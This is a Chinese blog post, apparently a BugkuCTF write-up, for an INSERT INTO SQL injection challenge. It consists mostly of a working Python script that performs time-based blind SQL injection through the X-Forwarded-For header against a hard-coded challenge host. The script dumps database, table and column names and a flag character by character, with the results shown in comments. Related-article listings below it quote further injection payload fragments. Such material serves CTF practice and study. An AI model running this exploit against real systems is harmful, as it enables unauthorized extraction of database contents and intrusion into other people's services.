CTF - BugkuCTF-insert into注入

最新推荐文章于 2021-10-03 22:47:30 发布
最新推荐文章于 2021-10-03 22:47:30 发布
阅读量1.1k 收藏
点赞数
分类专栏: 审计实战 文章标签: CTF BugkuCTF insert into注入 自动化脚本 substr
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Blood_Pupil/article/details/83307124
版权

代码如下

# -*- coding:utf-8 -*-
import requests
#"database()" 5 web15 确定数据库
#"(select group_concat(table_name) from information_schema.tables where table_schema='web15')"  14 client_ip,flag 确定表名
#"(select group_concat(column_name) from information_schema.columns where table_name='flag')" 4 flag 确定列名
payload = "(select group_concat(flag) from flag)" #32 cdbf14c9551d5be5612f7bb5d2867853 dump数据
def getlen(payload):
    payload_length = "'+ (select case when length(%s)>%d then sleep(2) end)); -- '" #网络环境差的情况下可以把延迟改高
    maxv = 300
    minv = 0
    while True:
        mid = (maxv+minv)/2
        rq = requests.get("http://123.206.87.240:8002/web15/",headers={"X-Forwarded-For":payload_length%(payload,mid)})
        if rq.elapsed.seconds >= 2:
            minv = mid
        else:
            maxv = mid
        if (maxv-minv) in [0,1]:
            break        
    print "[+] The length is %d"%maxv
    return maxv
def getchar(payload,length):
    payload_ascii = "'+ (select case when ord(substr(%s from %d for 1))=%d then sleep(2) end)); -- '"
    result = ''
    for i in range(length):
        for char in range(32,127):
            rq = requests.get("http://123.206.87.240:8002/web15/",headers={"X-Forwarded-For":payload_ascii%(payload,i+1,char)})
            if rq.elapsed.seconds >= 2:
                result += chr(char)
                print result+('.'*(length-i-1))
                break                            
    print "[+] The char is %s"%result
leng = getlen(payload)
getchar(payload, leng)

知识点

  1. substr(‘abc’ from 1 for 1)
  2. select case when 表达式 then 表达式 end 等价于IF(表达式,TRUE,False)
  3. like关键字不区分大小写且匹配时需要处理%,_。并且在本题中还不能出现,符号。
Blood_Pupil
关注
专栏目录
CTF-misc工具2-CTF-Tools-masterV1.3.7
08-17
CTF-Tools-master是一个专注于密码编码识别与解码的工具,能自动推断密码的编码类型,并进行解码。 适用人群: 该工具主要适用于参加CTF竞赛的选手,以及对密码编码算法感兴趣的信息安全从业人员。 使用场景: 在CTF竞赛...
Bugku-INSERT INTO 注入
苟有恒,必有三更眠,五更起。
07-08 956
INSERT INTO 注入 原题链接 http://120.24.86.145:8002/web15/ 分析 题目给出源码 <?php error_reporting(0); function getIp(){ $ip = ''; if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){ $ip = $_SERVE...
ctf题记录之SQL注入
qq_41814777的博客
09-28 807
sql注入文件上传 这是一道XCTF平台上的upload题,我没有想到它是个sql注入 http://111.198.29.45:46096/ 0x01 打开链接是一个登陆界面,不管三七二十一先注册登陆,是一个文件上传的页面,任意上传文件,发现只能传jpg才能记录下来。好像其他的都被过滤掉了。 0x02 值得注意的是我们上传的文件名都会显示到页面上,这个过程可能是经过数据库查询的,我们上传的文...
CTFBugku insert into注入
weixin_41607190的博客
01-07 374
原理:x-forwared-for注入,时间盲注,insert注入 点开网址就是这么一句话,源码也给出 function getIp(){ $ip = ''; if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){ $ip = $_SERVER['HTTP_X_FORWARDED_FOR']; #从x-forwared-for获取ip }else{ $ip =...
bugku-INSERT INTO注入(XFF时间注入) writeup
xuchen16的博客
09-30 6254
网址:http://120.24.86.145:8002/web15/ 题目给了源码 error_reporting(0); function getIp(){ $ip = ''; if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){ $ip = $_SERVER['HTTP_X_FORWARDED_FOR']; }else{ $ip = ...
无痕渗透“INSERT INTO”型SQL注入
热门推荐
逆水行舟
12-30 2万+
原文链接:http://www.mathyvanhoef.com/2011/10/exploiting-insert-into-sql-injections.html 在某个寂静的深夜,你徘徊在一个网站中,其中包含一个可提交form,需要你输入一个昵称。你输入了一个单引号作为你的昵称,网站返回了一条异常信息:“You have an error in your SQL syntax”。机智的你很快明
ctf-all-in-one
01-30
ctf-all-in-one
CTF-Tools-v1.3.7.zip
01-29
CTF常用工具集
CTF题目 [成绩查询 - Bugku CTF]union注入和sqlmap的入门使用,两种方法一道题
最新发布
07-16
### CTF题目 [成绩查询 - Bugku CTF]union注入和sqlmap的入门使用 #### 知识点一:SQL注入基础与Union注入原理 **SQL注入**是一种常见的网络安全攻击方式,通过将恶意SQL代码插入应用程序接收的数据中,进而操纵...
ctf-2017-release:BSidesSF CTF 2017版本
05-28
ctf-2017 2017 BSidesSF CTF面临的挑战 内置的 , , , , 在本地应对挑战 您可以使用docker在本地运行所有挑战。 docker-compose build && docker-compose up -d 挑战将在http://localhost:PORT提供,基于...
bugku—INSERT INTO注入解答
Just for funnnnnnnnnnnn
01-10 2200
本来不打算单独的ctf题目成文,但是这个题payload快看花我的眼睛了,不一篇记录一下代码对不住我的眼睛。 error_reporting(0); function getIp(){ $ip = ''; if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){ $ip = $_SERVER['HTTP_X_FORWARDED_FOR']; }else{ $i...
Bugku的SQL注入合集
j7ur8
06-22 2213
直接挂脚本:#!usr/bin/python # -*- coding: utf-8 -*- import string import requests string=string.ascii_letters+string.digits url="http://120.24.86.145:8002/web15/" playload="'+(select case when (substring((...
bugkuCTF Writeup (Web)36-40
Troublor的博客
02-01 3123
求getshell 文件上传绕过 上传一个php文件 用burp抓包 头部的Content-Type改成Multipart/form-data大小绕过 请求内容里的Content-Type改成image 文件名改成php5 就绕过了 不太明白Multipart/form-data这里为什么变成大能绕过,网上查也没查到,似乎并没有人关心multipart/form-dat
bugku------INSERT INTO 注入
bylfsj的博客
09-30 484
原创 bugku-Web-INSERT INTO注入(case注入技巧(逗号被过滤的延迟盲注)+延迟注入脚本) ...
bugku-INSERT INTO注入(附代码) 详细
偷一个月亮
06-19 664
# -*-coding:utf-8-*- # author : wen # flag:wen{b7bb30b3435f2e7c418b131f9e789f81} import requests import time url = 'http://123.206.87.240:8002/web15/' payload = 'abcdefghigklmnopqrstuvwxyzABCDEFGHI...
BugKuCTF(CTF-练习平台)——WEB-sql注入
Ifish的博客
02-25 3612
打开网址 注入题 修改id的值 发现只在id=1时显示,说明注入点应该是id=1 ‘闭合,发现不报错,尝试宽字节注入 报错 KEY{54f3320dc261f313ba712eb3f13a1f6d}...
bugku ctf 各种绕过 (各种绕过哟)
qq_42777804的博客
08-17 6460
打开打开       阅读代码 发现 只要使uname的sha1的值与passwd的sha1的值相等即可,但是同时他们两个的值又不能相等 构造 http://120.24.86.145:8002/web7/?uname[]=1&id=margin   并发送  passwd[]=2 的 postdata 请求即可   依旧利用简单 有特别 好安装的  火狐 插件 ...
ctf】sql注入——insert、update和delete注入
wlllllianqing的博客
10-03 807
insert、update和delete注入 insert:插入语法 insert into 表名 (参数1,参数2,参数3) values (x,y,z); 注入语句: insert into user (id, username,password) values ('4','w64654ll'or updatexml(1,concat(0x7e,database()),0),'233'); update:更新语法 update 表名 set 列名1= x where 列名2 =y 列名1:
CTF-Bugku-welcome to bugkuctf
fzykn06的博客
03-23 584
题目:http://123.206.87.240:8006/test1/ 初识这种题,被坑了挺久,有点难受啊。 打开这个网址得到这样一句话,习惯性的查看源码: 然后发现get方式传递了三个参数:txt、file和password,然后要继续解,就要$user存在,读取的 $user文件内容===welcome to the bugkuctf $flie要求为hint.php,这边就要用到一个p...
利用X-Forwarded-For注入:时间盲注与SQL技巧
这个Bugku Web题目的INSERT INTO注入挑战要求选手运用高级的SQL注入技巧,尤其是时间盲注,来破解服务器的输入过滤机制,以获取数据库的相关信息。这既考察了技术能力,也考验了在实际环境中解决问题的策略。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值